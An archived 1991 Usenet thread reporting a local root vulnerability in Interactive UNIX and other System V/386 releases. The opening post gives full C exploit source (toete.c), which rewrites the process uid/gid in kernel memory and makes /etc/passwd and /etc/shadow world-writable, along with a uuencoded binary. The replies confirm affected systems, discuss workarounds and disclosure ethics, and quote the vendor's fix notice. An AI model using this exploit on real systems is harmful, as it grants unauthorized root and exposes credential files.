[comp.unix.sysv386] SECURITY BUG IN INTERACTIVE UNIX SYSV386

lumpi@dobag.in-berlin.de (Joern Lubkoll) (02/11/91)

It was a long process of thoughts about this, but now, after half
a year of disput with interactive, here it finally is:

--- jl

Hello you at Interactive Systems Coporation !

it seems that your very cute interactive unix System has a nice bug !

EVERYONE you has access to a shell and a compiler or an interactive
System at home (to upload binaries) CAN BECOME ROOT.

It seems that you programmers aren't able to programm the 386 protected
mode correct. It exists the possibillity to write protect segment and
pages... It would be very useful to write protect the internatl data-
structures whicht the system uses to store information about the user.

Offering the ability to write in these segments is just like offering
CIA - Identity cards per mail-order for everyone (SALE $5).

If you don't believe... try the litte program down there and you'll see !

I didn't believe it either but ... see yourself !

I expect bug-fixes immediatly or my money back for the interactive
system...  VERY soon please !

I have had a lot of conversation with 'Intra Unix' in Germany and a
lot of people at 'ico.isc.com' about the problem. They just told
me this being a only a 'feature' not a bug !

Simply said, it is a bug in the coprocessor emulation code, which
will allow system without a co-cpu to be broken, just because some
programmers aren't able to allocate their own buffers :-)

If you have a co-cpu and Release >= 2.2 you may set the kernel tuneable
parameters UAREAUS and UAREARW to 0 to protect yourself.

Dobag does not have this problem, due to it being a 486 System, but
there will be a lot of systems without a co-cpu !

There is only one way to fix this problem: Phone Interactive or your
Distributor and get very angry !

Next follows toete.c, the program to kill any isc system not being
equipped with a co cpu.

--- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE

/* If you use Interactive Unix 2.2 uncomment the following line */
/* #define ISC22 */

#include <stdio.h> 
#ifdef ISC22
#include <sys/limits.h>
#include <sys/unistd.h>
#else
#include <limits.h>
#include <unistd.h>
#endif
#include <sys/sysi86.h>
#include <sys/signal.h>
#include <sys/types.h>
#define ushort	unsigned short
#define ulong	unsigned long
#include <sys/fs/s5dir.h>
#include <sys/user.h>

main()
{
  struct user *dumm;

  /*  0xE0000000 is the virtual adress of the ublock for the current
      running programm. */

  dumm = (struct user *) 0xE0000000;
	
  /*  Here we are so kind to change our effective and real user id
      to zero, which means, that we can do whatever we want... */

  dumm-> u_uid = 0;    /* A well programmed system has to give a
			  segmentation oder protection violation
			  error at this line. But don't expect
			  Interactive Unix to do so... */
  dumm-> u_gid = 0;

  dumm-> u_ruid = 0;
  dumm-> u_rgid = 0;
	
  /*  What would be the first thing you want to do if you become root
      on another system ? */

  chmod ("/etc/passwd",(int) 0666);
  chmod ("/etc/shadow",(int) 0666);

  /*  If you don't believe what I say, uncomment the following line: */

/*  execl("/bin/sh","sh","-c","/bin/ls -l /etc/passwd",(char *) 0); */
}

--- END OF toete.c ---

For those, which won't believe, here is a uuencoded version of the
binary 'toete'.

table
 !"#$%&'()*+,-./0123456789:;<=>?
@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_
begin 644 toete
M3 $$ *+Q%"<          !P #P$+ 0  S (  #P"        U    -    "<z
M T  +G1E>'0   #0    T    ,P"  #0                    (    "YDy
M871A    G -  )P#0  \ @  G ,                  $     N8G-S    x
M -@%0 #8!4                            "     +F-O;6UE;G0     w
M          #8!0                    (  ,.0D)"#[ B+[(M%"(U4A1")v
M%9P#0 !2C54,4E#HW____VH Z)    "#Q 3H'    (/$#%#H<P(  &H N $ u
M  ":      < ],.0D)#K2\=%_    ."+1?QFQX#J$     "+1?QFQX#L$   t
M  "+1?QFQX#N$     "+1?QFQX#P$     !HM@$  &B@ T  Z P   "#Q C)s
MPU6+[%#KKY"X#P   )H     !P /@NX!   SP,.0D)!5B^R![(0"  !75K[_r
M____@WT( '4Q:+0%0 #HP    %F%P(E%"'0)BT4(B@"$P'46@#VP!4   '0&q
M,\!>7\G#QT4(O05  ,8%L 5   !HPP5  (U%@%#H6 $  (/$"/]U"(U%CE#Hp
M20$  (/$"&H C46 4.@3 0  @\0(A<"+^'P^: ("  "-A7[]__]05^@, 0  o
M@\0,/0("  !U&V@" @  C85^_?__4&BL T  Z+0   "#Q PS]E?H"0   %F+n
MQEY?R<.0D+@&    F@     '  ^"#@$  #/ PY"0D%6+[%=64XM]"(L=G - m
M (7;=24SP%M>7\G#D)#_,X/#!%?H&0   (/$"(7 B_!T"(O&6UY?R<.0@SL l
M==_KU)!5B^Q75HM]"(MU#.L.D)"0#[X'1ST]    =!P/O@</OA9&.\)TZHH'k
MA,!U% ^^1O\]/0   '4)B\9>7\G#D)"0,\!>7\G#D)!75HM\) R+="00BTPDj
M%(O'B]'!Z0+SI8O*@>$#    \Z1>7\.X!0   )H     !P /@DH   ##D+@#i
M    F@     '  ^"-@   ,.05XO6BWPD##/ N?_____RKO?1BW0D#(M\) B+h
MP<'I O.EB\B!X0,   #SI(M$) B+\E_#D*/4!4  N/_____#D.@7    BU0Dg
M!+@!    F@     '  ^"V?___\/#D)"0     "]E=&,O<&%S<W=D   @(" @f
M(" @(" H*"@H*" @(" @(" @(" @(" @(" @($@0$! 0$! 0$! 0$! 0$!"$e
MA(2$A(2$A(2$$! 0$! 0$(&!@8&!@0$! 0$! 0$! 0$! 0$! 0$! 0$!$! 0d
M$! 0@H*"@H*" @(" @(" @(" @(" @(" @(" @(0$! 0(               c
M                                                            b
M                                                            a
M                                       ! @,$!08'" D*"PP-#@\0z
M$1(3%!46%Q@9&AL<'1X?("$B(R0E)B<H*2HK+"TN+S Q,C,T-38W.#DZ.SP]y
M/C] 86)C9&5F9VAI:FML;6YO<'%R<W1U=G=X>7I;7%U>7V!!0D-$149'2$E*x
M2TQ-3D]045)35%565UA96GM\?7Y_                                w
M                                                            v
M                                                            u
M                      $   !#2%)#3$%34P!A<V-I:0 O;&EB+V-H<F-Lt
+87-S+P          s
 r
end


--- END ---

JUST HAVE FUN !

mfg. JL

-- 
lumpi@dobag.in-berlin.de  --  "Nothing is the complete absence of everything."

john@jwt.UUCP (John Temples) (02/12/91)

In article <KR3NBQQ@dobag.in-berlin.de> lumpi@dobag.in-berlin.de (Joern Lubkoll) writes:
>it seems that your very cute interactive unix System has a nice bug !

Yikes.  This also works on ESIX-D without a coprocessor, and on ISC 2.0.2
*with* a coprocessor.  It failed on Microport 2.2 with a coprocessor.

Now, the question is, what do we do to protect ourselves in the meantime?
-- 
John W. Temples -- john@jwt.UUCP (uunet!jwt!john)

sef@kithrup.COM (Sean Eric Fagan) (02/12/91)

In article <1991Feb11.184130.11321@jwt.UUCP> john@jwt.UUCP (John Temples) writes:
>Yikes.  This also works on ESIX-D without a coprocessor, and on ISC 2.0.2
>*with* a coprocessor.  It failed on Microport 2.2 with a coprocessor.
>Now, the question is, what do we do to protect ourselves in the meantime?

Get SCO.  It does not have this "feature," and still manages to support
Weitek coprocessors (the coprocessor the original poster was referring to, I
believe).  (The Weitek's use memory for registers and, obviously, need to be
able to write them.  The weitek registers are stuck in the upage, and
happen, in apparantly every 3.2 save SCO's, to be in the same page as the
uid stuff.  *Bad*.  *Very* bad.)

-- 
Sean Eric Fagan  | "I made the universe, but please don't blame me for it;
sef@kithrup.COM  |  I had a bellyache at the time."
-----------------+           -- The Turtle (Stephen King, _It_)
Any opinions expressed are my own, and generally unpopular with others.

jpp@specialix.co.uk (John Pettitt) (02/12/91)

lumpi@dobag.in-berlin.de (Joern Lubkoll) writes:
>It was a long process of thoughts about this, but now, after half
>a year of disput with interactive, here it finally is:

>--- jl


We have confirmed that this does indeed work on ISC 2.2 and that SCO
unix does `the right thing' (tm) and core dumps the application.

Maybe we should be saying nice things about SCO's security stuff
after all !

-- 
John Pettitt, Specialix International, 
Email: jpp@specialix.com Tel +44 (0) 9323 54254 Fax +44 (0) 9323 52781
Disclaimer: Me, say that ?  Never, it's a forged posting !

lumpi@dobag.in-berlin.de (Joern Lubkoll) (02/12/91)

john@jwt.UUCP (John Temples) writes:
>In article <KR3NBQQ@dobag.in-berlin.de> lumpi@dobag.in-berlin.de (Joern Lubkoll) writes:
>>it seems that your very cute interactive unix System has a nice bug !
>Yikes.  This also works on ESIX-D without a coprocessor, and on ISC 2.0.2
>*with* a coprocessor.  It failed on Microport 2.2 with a coprocessor.

It even works on 2.2 with a coprocessor ! You have to set the Kernel
Tuneable Parameters UAREAUS and UAREARW to 0 to protect you u-block !
If Esix dows have such parameters, please try them and report me the
experiences.
2.02 is unprotectable ! a 2.2 System without a co-cpu is also unprotect-
able !

>Now, the question is, what do we do to protect ourselves in the meantime?
That is the problem which made me think half a year before posting it !
The time until the bug-fix arrives will be short I hope, or Interactive
has a problem !

jl

-- 
lumpi@dobag.in-berlin.de  --  "Nothing is the complete absence of everything."

rot@unlisys.in-berlin.de (Robert Rothe) (02/12/91)

lumpi@dobag.in-berlin.de (Joern Lubkoll) writes:

>It was a long process of thoughts about this, but now, after half
>a year of disput with interactive, here it finally is:

well done. hope this helps !
	robert.

-- 
Unlisys,  Hohenzollerndamm 7, 1000 Berlin 31     ---     Robert Rothe
unido!fub!unlisys!rot,   rot@unlisys.in-berlin.de,    030 / 88 22 980
    * Ein Krieg ist um nichts besser als ein gewoehnlicher Mord *

weave@chopin.udel.edu (Ken Weaverling) (02/13/91)

My God, it also worked on my AT&T Sysv/386 3.1 ...  with a 80387....

Time to give my vendor a call.  I'm not going to be able to sleep nights now.
-- 
>>>---> Ken Weaverling  >>>---->  weave@brahms.udel.edu

wengland@stephsf.stephsf.com (Bill England) (02/13/91)

   The program crashes with a memory falt on SCO ODT 1.0 on a system
   with an fpu.

   I have serious reservations about this kind of post.  While as an
   system administrator system I want to know, at the same time it
   is similar to giving handguns to a bunch of street thugs.

   The only way to protect ourselves, for now, is that those who have 
   read the posting should inform their system administrators that the
   bug exists and the system admins can ask (Tell) everyone to not do 
   it.
  

-- 
 +-  Bill England,  wengland@stephsf.COM -----------------------------------+
 |   * *      H -> He +24Mev                                                |
 |  * * * ... Oooo, we're having so much fun making itty bitty suns *       |
 |__ * * ___________________________________________________________________| 

kdenning@pcserver2.naitc.com (Karl Denninger) (02/13/91)

In article <KR3NBQQ@dobag.in-berlin.de> lumpi@dobag.in-berlin.de (Joern Lubkoll) writes:
>It was a long process of thoughts about this, but now, after half
>a year of disput with interactive, here it finally is:
>
>--- jl
>
>Hello you at Interactive Systems Coporation !
>
>it seems that your very cute interactive unix System has a nice bug !
>
>EVERYONE you has access to a shell and a compiler or an interactive
>System at home (to upload binaries) CAN BECOME ROOT.

.... details deleted.

I have confirmed this here......

It is a VERY nasty bug.  I highly suggest that all of you out there who have
ISC complain immediately to Interactive AND Kodak.

All of the systems here on ISC have coprocessors, so the bug can be worked
around.  Those of you without coprocessors are hosed, folks.  Yes, you too
can really become root in a few minutes.....

Needless to say, I am most disappointed with ISC on this one.  I am even
more disappointed with the apparent fact that they seem to have known about
this for quite some time, and ignored it.

Well, now it can't be ignored.  

--
Karl Denninger - AC Nielsen, Bannockburn IL (708) 317-3285
kdenning@nis.naitc.com

"The most dangerous command on any computer is the carriage return."
Disclaimer:  The opinions here are solely mine and may or may not reflect
  	     those of the company.

lumpi@dobag.in-berlin.de (Joern Lubkoll) (02/13/91)

sef@kithrup.COM (Sean Eric Fagan) writes:
>In article <1991Feb11.184130.11321@jwt.UUCP> john@jwt.UUCP (John Temples) writes:
>>Yikes.  This also works on ESIX-D without a coprocessor, and on ISC 2.0.2
>>*with* a coprocessor.  It failed on Microport 2.2 with a coprocessor.
>>Now, the question is, what do we do to protect ourselves in the meantime?
>Get SCO.  It does not have this "feature," and still manages to support
>Weitek coprocessors (the coprocessor the original poster was referring to, I
>believe).  (The Weitek's use memory for registers and, obviously, need to be
>able to write them.  The weitek registers are stuck in the upage, and
>happen, in apparantly every 3.2 save SCO's, to be in the same page as the
>uid stuff.  *Bad*.  *Very* bad.)
The problem in interactive is not weitek dependend, it is a problem with
the coprocessor emulator, if there is no coprocessor present !
I never tried toete.c having a weitek coprocessor, due to dobag being
an 486 without an weitek.

I would be interested in any note about it.

mfg. JL
-- 
lumpi@dobag.in-berlin.de  --  "Nothing is the complete absence of everything."

lumpi@dobag.in-berlin.de (Joern Lubkoll) (02/13/91)

jtc@motcad.portal.com (J.T. Conklin) writes:
>In article <1991Feb11.184130.11321@jwt.UUCP> john@jwt.UUCP (John Temples) writes:
>>In article <KR3NBQQ@dobag.in-berlin.de> lumpi@dobag.in-berlin.de (Joern Lubkoll) writes:
>>>it seems that your very cute interactive unix System has a nice bug !
>>
>>Yikes.  This also works on ESIX-D without a coprocessor, and on ISC 2.0.2
>>*with* a coprocessor.  It failed on Microport 2.2 with a coprocessor.
>>
>>Now, the question is, what do we do to protect ourselves in the meantime?
>If I remember correctly, Sun Microsystems sent out a fixed version of 
>sendmail to its customer base free of charge the week after the Internet
>Worm Attack.  I see no reason why we should expect less from the i386
>UNIX vendors.  In my opinion, any vendor that doesn't respond to this
>problem with the attention it is due, doesn't deserve to be in business.
so mote it be ... says me :-)

jl

-- 
lumpi@dobag.in-berlin.de  --  "Nothing is the complete absence of everything."

lumpi@dobag.in-berlin.de (Joern Lubkoll) (02/13/91)

marc@jahangir.UUCP (Marc Rossner) writes:

>> In article <1991Feb11.184130.11321@jwt.UUCP> john@jwt.UUCP (John Temples) writes:
>> >Yikes.  This also works on ESIX-D without a coprocessor, and on ISC 2.0.2
>> >*with* a coprocessor.  It failed on Microport 2.2 with a coprocessor.
>> >Now, the question is, what do we do to protect ourselves in the meantime?
>Works like a charm on ISC 2.2 with a 486 -- good thing the only people
>over here that read this newsgroup already know the root password.
>"Feature", indeed!  Hope ISC hears a lot about this, if anyone can ever
>get past the 15 minutes it takes their telephone guy to locate you in his
>files before he'll let you discuss anything real.
Set UAREAUS and UAREARW to zero and it won't work any more !
But this works onlu on ISC 2.2 and not on 2.02. No 2.02 system can be 
protected !


jl
-- 
lumpi@dobag.in-berlin.de  --  "Nothing is the complete absence of everything."

pax@megasys.com (Garry M. Paxinos) (02/13/91)

In article <5A5NGEK@dobag.in-berlin.de> lumpi@dobag.in-berlin.de (Joern Lubkoll) writes:
   The problem in interactive is not weitek dependend, it is a problem with
   the coprocessor emulator, if there is no coprocessor present !
   I never tried toete.c having a weitek coprocessor, due to dobag being
   an 486 without an weitek.

   I would be interested in any note about it.

Tote is a perfect security breach on my '386 with a weitek...

It's going to be very interesting to see how fast ISC responds to this
now...

pax
--
E-Mail:pax@megasys.com    pax@ankh.ftl.fl.us    gmp@pinet.aip.org
USNail:Megasystems, Inc.    2055 South Congress Ave,  Delray Beach,  FL  33445
UUCP  :{gatech!uflorida!novavax!ankh,   mthvax,  shark,   attmail}!megasys!pax
Voice :407-243-2405   Data: 407-243-2407  Fax: 407-243-2408   Telex: 156281499
          "This is America, Right?!?!?"  member of 2 Live Crew

chris@alderan.uucp (Christoph Splittgerber) (02/13/91)

In article <KR3NBQQ@dobag.in-berlin.de> lumpi@dobag.in-berlin.de (Joern Lubkoll) writes:
>it seems that your very cute interactive unix System has a nice bug !

Oh my god - its really true. (on my ISC 2.0.2 *with* co-proc.)

While we've all been discussing security holes in the file-system and
talked about SUID and SGID and all that stuff there is a way to break
everything and it's so goddam easy that it's hard to believe it.
It's not a security hole, it's a SECURITY ABYSS.


I don't like ISC's upgrate provision clauses and I don't wana pay for this
bugfix.

So what to do now ? .....  -:(  -:(  -:(

Hey you people at ISC, what's up ?

-- 
************************ Brain fault (core dumped) *************************
Replies-To:  chris@alderan.uucp        UUCP: uunet!mcsun!unido!alderan!chris 
Phone:       +49 711 344375            Fax:  +49 711 3460684

tim@dell.co.uk (Tim Wright) (02/13/91)

In <1991Feb12.020625.6779@kithrup.COM> sef@kithrup.COM (Sean Eric Fagan) writes:

>In article <1991Feb11.184130.11321@jwt.UUCP> john@jwt.UUCP (John Temples) writes:
>>Yikes.  This also works on ESIX-D without a coprocessor, and on ISC 2.0.2
>>*with* a coprocessor.  It failed on Microport 2.2 with a coprocessor.
>>Now, the question is, what do we do to protect ourselves in the meantime?

>Get SCO.  It does not have this "feature," and still manages to support
>Weitek coprocessors (the coprocessor the original poster was referring to, I
>believe).  (The Weitek's use memory for registers and, obviously, need to be
>able to write them.  The weitek registers are stuck in the upage, and
>happen, in apparantly every 3.2 save SCO's, to be in the same page as the
>uid stuff.  *Bad*.  *Very* bad.)

Not entirely true. This program fails on Dell UNIX (ISC 2.0.2-derived), with
or without a '387. Segmentation Violation - core dumped. 'Dunno about the
weitek - I don't use F**tran unless forced :-)

Tim
--
Tim Wright, Dell Computer Corp. (UK) | Email address
Bracknell, Berkshire, RG12 1RW       | Domain: tim@dell.co.uk
Tel: +44-344-860456                  | Uucp: ...!ukc!delluk!tim
"What's the problem? You've got an IQ of six thousand, haven't you?"

lumpi@dobag.in-berlin.de (Joern Lubkoll) (02/13/91)

kdenning@pcserver2.naitc.com (Karl Denninger) writes:
>In article <KR3NBQQ@dobag.in-berlin.de> lumpi@dobag.in-berlin.de (Joern Lubkoll) writes:
>>It was a long process of thoughts about this, but now, after half
>>a year of disput with interactive, here it finally is:
>>
>>--- jl
>>
>>Hello you at Interactive Systems Coporation !
>>
>>it seems that your very cute interactive unix System has a nice bug !
>>
>>EVERYONE you has access to a shell and a compiler or an interactive
>>System at home (to upload binaries) CAN BECOME ROOT.
>.... details deleted.
>Needless to say, I am most disappointed with ISC on this one.  I am even
>more disappointed with the apparent fact that they seem to have known about
>this for quite some time, and ignored it.
>Well, now it can't be ignored.  
That was my hope in posting this. I'm going to fax it to the mayor unix
magazines in the world, just to make the effect a little harder to ignore
for ISC.
I think there will be a bug fix very soon :-)

jl
-- 
lumpi@dobag.in-berlin.de  --  "Nothing is the complete absence of everything."

debra@wsinfo11.info.win.tue.nl (Paul de Bra) (02/13/91)

In article <1991Feb11.184130.11321@jwt.UUCP> john@jwt.UUCP (John Temples) writes:
>In article <KR3NBQQ@dobag.in-berlin.de> lumpi@dobag.in-berlin.de (Joern Lubkoll) writes:
>>it seems that your very cute interactive unix System has a nice bug !
>Yikes.  This also works on ESIX-D without a coprocessor, and on ISC 2.0.2
>*with* a coprocessor.  It failed on Microport 2.2 with a coprocessor.
>...

This (and other postings) suggests that the problem would be found
in the more generic sVr3.2 from AT&T.
However, I tried AT&T sVr3.2 (version 2.1) on a machine (with coprocessor)
and got a memory fault.
So it looks like somehow the same bug ended up in ESIX and ISC
(and AT&T sVr3.1?) but not in AT&T sVr3.2.1 or SCO.

Paul.
(debra@research.att.com, debra@win.tue.nl)

chip@tct.uucp (Chip Salzenberg) (02/13/91)

According to jpp@specialix.co.uk (John Pettitt):
>We have confirmed that this does indeed work on ISC 2.2 and that SCO
>unix does `the right thing' (tm) and core dumps the application.

It is good to see that SCO's engineers, unlike those at ISC and
Everex, have an effective grasp on the basic principles of memory
protection covered in the first semester of OS design class.

Forgive me if I react, not by congratulating SCO, but by dropping my
jaw in mind-boggled astonishment that such a huge, gaping, obvious,
you-can-drive-a-truck-through-it security hole was ever released by
ISC or Everex in a beta, much less sold to customers in version after
version after version.

>Maybe we should be saying nice things about SCO's security stuff
>after all !

I'm sorry, but SCO C2 security is still a botch.
-- 
Chip Salzenberg at Teltronics/TCT     <chip@tct.uucp>, <uunet!pdn!tct!chip>
 "I want to mention that my opinions whether real or not are MY opinions."
             -- the inevitable William "Billy" Steinmetz

norm@cfctech.cfc.com (Norman J. Meluch) (02/14/91)

weave@chopin.udel.edu (Ken Weaverling) writes:
>My God, it also worked on my AT&T Sysv/386 3.1 ...  with a 80387....

Well that uuencoded program failed (Memory Fault) on my AT&T Sys V/386 3.2.1.
However, I have no compiler to try the source.  Anyone else try it?

							- Norm.
-- 
|~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Norman J. Meluch ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
| Mail: norm@cfctech.cfc.com           Fax:(313)948-4975  Voice:(313)948-4809 |
| Note: The opinions expressed here are in no way to be confused with valid   |
|_______ideas or corporate policy.____________________________________________|

rhealey@digibd.com (Rob Healey) (02/14/91)

In article <1991Feb12.052336.29639@motcad.portal.com> jtc@motcad.portal.com (J.T. Conklin) writes:
>>Now, the question is, what do we do to protect ourselves in the meantime?
>If I remember correctly, Sun Microsystems sent out a fixed version of 
>sendmail to its customer base free of charge the week after the Internet
>Worm Attack.  I see no reason why we should expect less from the i386
>UNIX vendors.  In my opinion, any vendor that doesn't respond to this
>problem with the attention it is due, doesn't deserve to be in business.
>

	I'd consider extending this to any vendor that didn't catch this
	BEFORE the system was shipped doesn't deserve to be in business.

	HOW can the QA dept. of ANY UNIX system miss a bug of this
	magnitude? After all, they should have had unexplained system
	panics when the test that scribbles over all of a USER mode virtual
	address space to check MMU problems scribbles all over the ublock...

	ANY user mode process can go wild, scribble in the higher area of it's
	VM space, wipe out the ublock and it's bye-bye UNIX...

	Panic: OS vendor irresponsibility
	       syncing disks... (glug, glug, glug) B^(.

	       -Rob

Speaking for self, not company.

bekesy@uhccux.uhcc.Hawaii.Edu (Bekesey Lab) (02/14/91)

>>Yikes.  This also works on ESIX-D without a coprocessor, and on ISC 2.0.2
>>*with* a coprocessor.  It failed on Microport 2.2 with a coprocessor.
>>Now, the question is, what do we do to protect ourselves in the meantime?
>
>Get SCO.  [...]

Please keep your mindless SCO chauvinism to yourself.

sef@kithrup.COM (Sean Eric Fagan) (02/14/91)

In article <1739@svin02.info.win.tue.nl> debra@info.win.tue.nl writes:
>This (and other postings) suggests that the problem would be found
>in the more generic sVr3.2 from AT&T.

It was.  Note that it was in the *original* release of 3.2 for the '386.

>So it looks like somehow the same bug ended up in ESIX and ISC
>(and AT&T sVr3.1?) but not in AT&T sVr3.2.1 or SCO.

SCO noticed it and fixed it for their release of 3.2.0; ISC, ESIX, and
others apparantly didn't notice it until later, if at all.

-- 
Sean Eric Fagan  | "I made the universe, but please don't blame me for it;
sef@kithrup.COM  |  I had a bellyache at the time."
-----------------+           -- The Turtle (Stephen King, _It_)
Any opinions expressed are my own, and generally unpopular with others.

peter@ficc.ferranti.com (Peter da Silva) (02/14/91)

In article <1991Feb11.184130.11321@jwt.UUCP> john@jwt.UUCP (John Temples) writes:
> In article <KR3NBQQ@dobag.in-berlin.de> lumpi@dobag.in-berlin.de (Joern Lubkoll) writes:
> >it seems that your very cute interactive unix System has a nice bug !

> Yikes.  This also works on ESIX-D without a coprocessor, and on ISC 2.0.2
> *with* a coprocessor.  It failed on Microport 2.2 with a coprocessor.

It fails on Intel System V/386 rev 3.2u. Now I'm *really* bummed out
about them fobbing us off on Interactive.
-- 
Peter da Silva.  `-_-'  peter@ferranti.com
+1 713 274 5180.  'U`  "Have you hugged your wolf today?"

src@scuzzy.in-berlin.de (Heiko Blume) (02/14/91)

sef@kithrup.COM (Sean Eric Fagan) writes:
>Get SCO.  It does not have this "feature," and still manages to support
>Weitek coprocessors (the coprocessor the original poster was referring to, I
>believe).  (The Weitek's use memory for registers and, obviously, need to be
>able to write them.  The weitek registers are stuck in the upage, and
>happen, in apparantly every 3.2 save SCO's, to be in the same page as the
>uid stuff.  *Bad*.  *Very* bad.)

there's no problem with ISC if you have any co-processor. the problem is the
floating point emulation that runs in user space and needs to write the u area. 

i hope ISC will send me a 'bug fix' in the form of a 33MHz 80387 :-)
-- 
      Heiko Blume <-+-> src@scuzzy.in-berlin.de <-+-> (+49 30) 691 88 93
                    public source archive [HST V.42bis]:
        scuzzy Any ACU,f 38400 6919520 gin:--gin: nuucp sword: nuucp
                     uucp scuzzy!/src/README /your/home

src@scuzzy.in-berlin.de (Heiko Blume) (02/14/91)

jtc@motcad.portal.com (J.T. Conklin) writes:

>In article <1991Feb11.184130.11321@jwt.UUCP> john@jwt.UUCP (John Temples) writes:
>>Now, the question is, what do we do to protect ourselves in the meantime?

>If I remember correctly, Sun Microsystems sent out a fixed version of 
>sendmail to its customer base free of charge the week after the Internet
>Worm Attack.  I see no reason why we should expect less from the i386
>UNIX vendors.  In my opinion, any vendor that doesn't respond to this
>problem with the attention it is due, doesn't deserve to be in business.

especially considering the fact that they tell you (implicitly) in the release
notes that there is THE security problem in all 2.0.2 systems
and how to fix it in 2.2, only that they didn't mention that you
need a math co for it to work. the WORST feature ever!
-- 
      Heiko Blume <-+-> src@scuzzy.in-berlin.de <-+-> (+49 30) 691 88 93
                    public source archive [HST V.42bis]:
        scuzzy Any ACU,f 38400 6919520 gin:--gin: nuucp sword: nuucp
                     uucp scuzzy!/src/README /your/home

src@scuzzy.in-berlin.de (Heiko Blume) (02/14/91)

wengland@stephsf.stephsf.com (Bill England) writes:
>   I have serious reservations about this kind of post.  While as an
>   system administrator system I want to know, at the same time it
>   is similar to giving handguns to a bunch of street thugs.

anyone who can read the release notes for ISC 2.2 can find
out on page 10 or so.....they published the bug themselves!!

>   The only way to protect ourselves, for now, is that those who have 
>   read the posting should inform their system administrators that the
>   bug exists and the system admins can ask (Tell) everyone to not do 
>   it.

not exactly, for public access to my source archive i've set up
a chroot() user that can't write anywhere, unhackable :-)
-- 
      Heiko Blume <-+-> src@scuzzy.in-berlin.de <-+-> (+49 30) 691 88 93
                    public source archive [HST V.42bis]:
        scuzzy Any ACU,f 38400 6919520 gin:--gin: nuucp sword: nuucp
                     uucp scuzzy!/src/README /your/home

jgd@Dixie.Com (John G. DeArmond) (02/14/91)

wengland@stephsf.stephsf.com (Bill England) writes:

>   I have serious reservations about this kind of post.  While as an
>   system administrator system I want to know, at the same time it
>   is similar to giving handguns to a bunch of street thugs.

>   The only way to protect ourselves, for now, is that those who have 
>   read the posting should inform their system administrators that the
>   bug exists and the system admins can ask (Tell) everyone to not do 
>   it.

Actually, I was thinking quite the opposite.  This little experience
is the shining example of why security-by-obscurity does NOT work and
why ALL security holes should be reported widely.

Look at what happened:

Our friend at dobag tried for over 6 months to quietly work with ISC 
and get the bug fixed.  Aside from his getting the usual it's-not-a-bug-
its-a-feature runaround,  consider what would have happened if ISC HAD
addressed the problem when he originally reported it.  They'd have most
likely packaged the fix - if they could have managed to get it right 
(shades of the inode bug) - in their next "upgrade" for which a hefty
fee would be charged and which those who don't pay the support extortion
would not know about.  This fix might have come out in 6 months or it 
might have taken a year or who knows.

But suppose they'd fixed it correctly and responded with free fixes to 
every owner.  The owners of other brands of V3 would have remained just
as exposed.  Even if the cumbersome CERT mechanism had lumbered into
action, it would have still been months before fixes got implemented 
with other vendors and still longer before they hit the streets.  And 
with the fanatical obsession with secrecy and obscurity among the 
CERT-types, none of us would have known exactly what "security chasm"
had been filled.

As this event traspired, in less than 2 days, all the common Unixes had
been tested, the test results posted here, workarounds developed (so you
have to buy a 387 - big deal if you system really needs the security)
and last but not least, we now most likely have people poking around 
looking for related problems.  (Everybody so hacking raise your hands now..
Hmm, yep, thought so :-)  

As the system owner and administrator, I got to exactly evaluate the risk
and decide what to do about it.  Since I chose long ago not to rely on 
permissions to protect sensitive data files, all such information is
stored encrypted.  I can therefore decide not to spin in place and lose 
sleep over the problem.

I say "THANK YOU" to all the people involved.  The system of free flowing
information work again.

John

-- 
John De Armond, WD4OQC        | "Purveyors of speed to the Trade"  (tm)
Rapid Deployment System, Inc. |  Home of the Nidgets (tm)
Marietta, Ga                  | 
{emory,uunet}!rsiatl!jgd      |"Politically InCorrect.. And damn proud of it  

(Uri Blumenthal) (02/14/91)

In article <5A5NKHK@dobag.in-berlin.de>, lumpi@dobag.in-berlin.de (Joern Lubkoll) writes:
|> >>>it seems that your very cute interactive unix System has a nice bug !
|> >>
|> >>Yikes.  This also works on ESIX-D without a coprocessor, and on ISC 2.0.2
|> >>*with* a coprocessor.  It failed on Microport 2.2 with a coprocessor.

It works perfectly well on ESIX Rev.D with co-processor. 
With amazing speed (:-).

-- 
Regards,
Uri Blumenthal		uri@ibm.com,  uunet!angmar!uri
======================================================
<Disclaimer>

sef@kithrup.COM (Sean Eric Fagan) (02/14/91)

In article <11450@uhccux.uhcc.Hawaii.Edu> bekesy@uhccux.uhcc.Hawaii.Edu (Bekesey Lab) writes:
>>>Now, the question is, what do we do to protect ourselves in the meantime?
>>Get SCO.  [...]
>Please keep your mindless SCO chauvinism to yourself.

Gee, that's funny.  When people complain all about SCO's problems, and other
people respond with "Get ISC or ESIX," I don't see you complaining about
that.

-- 
Sean Eric Fagan  | "I made the universe, but please don't blame me for it;
sef@kithrup.COM  |  I had a bellyache at the time."
-----------------+           -- The Turtle (Stephen King, _It_)
Any opinions expressed are my own, and generally unpopular with others.

martys@mchale.ism.isc.com (Marty Stewart) (02/14/91)

The recent reports of a security hole in AT&T UNIX System V/386
Release 3.2, and in the INTERACTIVE UNIX Operating System which
is based upon it, are accurate.  Users with a math coprocessor
and INTERACTIVE Version 2.2  or later of the INTERACTIVE UNIX
Operating System should read the INTERACTIVE UNIX System Release
Notes, page 10, first bullet item for the workaround.

For all other users, INTERACTIVE Systems Corp. will provide a
comprehensive fix to the problem.  It will be provided as an
update (bug-fix) diskette to users of 386/ix Version 2.0.2,
INTERACTIVE UNIX Version 2.2.1, and the C2 Security Extension.
For Version 2.2 users without a math coprocessor, call into
Warranty support, (213) 453-8649 and ask for the free upgrade
to Version 2.2.1 as well as the 2.2.1 security-hole bug-fix
diskette.  As with all INTERACTIVE bug-fix diskettes, it will be
available free of charge through the Support department.

The anticipated availability date of the bug-fix is February 22nd.

Marty C. Stewart
Support Team Leader
Interactive Systems Corp.

bill@ssbn.WLK.COM (Bill Kennedy) (02/14/91)

In article <483@stephsf.stephsf.com> wengland@stephsf.stephsf.com (Bill England) writes:
>
>   The program crashes with a memory falt on SCO ODT 1.0 on a system
>   with an fpu.

That's good to know.  I've not had a whole lot of complimentary things to
say about ODT, this is important enough to remember.

>   I have serious reservations about this kind of post.  While as an
>   system administrator system I want to know, at the same time it
>   is similar to giving handguns to a bunch of street thugs.

No, I completely disagree.  The street thugs already had the handguns and
they were already pointed at our heads, this just gave us fair warning so
that we could defend ourselves.  I read the article with mixed emotions
because I took a rather extreme defense.  I have an NCR Tower who has
